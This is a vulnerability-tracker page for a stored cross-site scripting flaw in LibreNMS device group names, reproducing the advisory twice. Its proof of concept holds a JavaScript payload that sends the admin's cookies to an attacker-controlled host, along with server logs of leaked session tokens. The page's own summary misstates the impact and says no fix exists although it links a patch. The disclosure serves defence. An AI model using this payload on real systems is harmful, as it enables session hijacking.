Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.1
LibreNMS Stored Cross-Site Scripting in Device Group Names
CVE-2026-26991
GHSA-5pqf-54qp-32wx
Summary
LibreNMS users with admin privileges can be tricked into deleting a device group by clicking on a malicious link in the group's name. This can happen when a user with admin privileges views a device group with a specially crafted name. To fix this, LibreNMS developers should sanitize user-input device group names to prevent malicious code from being executed.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| librenms | librenms | <= 26.2.0 | – |
Original title
LibreNMS /device-groups name Stored Cross-Site Scripting
Original description
### Summary
**/device-groups name Stored Cross-Site Scripting**
- HTTP POST
- Request-URI(s): "/device-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.
- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.
### Details
The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:
_resources/views/device-group/index.blade.php:_
```
@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]
<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id)
}}')"> // using the device's name in the Delete button functionality without
sanitizing for XSS related characters/strings
```
As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.
### PoC
- Login
- Select Devices > Manage Groups
- Select New Device Group
- Input 12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookie-
- '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into
- the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)
- Select "access_points.accesspoint_id" as the Conditional input
- Input 1 into the Conditional value input box
- Select Save
- Select the Delete Icon for the newly created Device Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled
- server, leaking the user's cookies.
### Impact
Attacker Controlled server's logs:
```
192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai
l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh
LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL
Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"
```
**/device-groups name Stored Cross-Site Scripting**
- HTTP POST
- Request-URI(s): "/device-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.
- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.
### Details
The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:
_resources/views/device-group/index.blade.php:_
```
@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]
<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id)
}}')"> // using the device's name in the Delete button functionality without
sanitizing for XSS related characters/strings
```
As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.
### PoC
- Login
- Select Devices > Manage Groups
- Select New Device Group
- Input 12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookie-
- '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into
- the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)
- Select "access_points.accesspoint_id" as the Conditional input
- Input 1 into the Conditional value input box
- Select Save
- Select the Delete Icon for the newly created Device Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled
- server, leaking the user's cookies.
### Impact
Attacker Controlled server's logs:
```
192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai
l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh
LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL
Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"
```
nvd CVSS3.1
4.8
nvd CVSS4.0
5.1
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
- https://nvd.nist.gov/vuln/detail/CVE-2026-26991
- https://github.com/advisories/GHSA-5pqf-54qp-32wx
- https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0b... Patch
- https://github.com/librenms/librenms/pull/19041 Issue Tracking
- https://github.com/librenms/librenms/releases/tag/26.2.0 Product Release Notes
- https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx Exploit Third Party Advisory
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026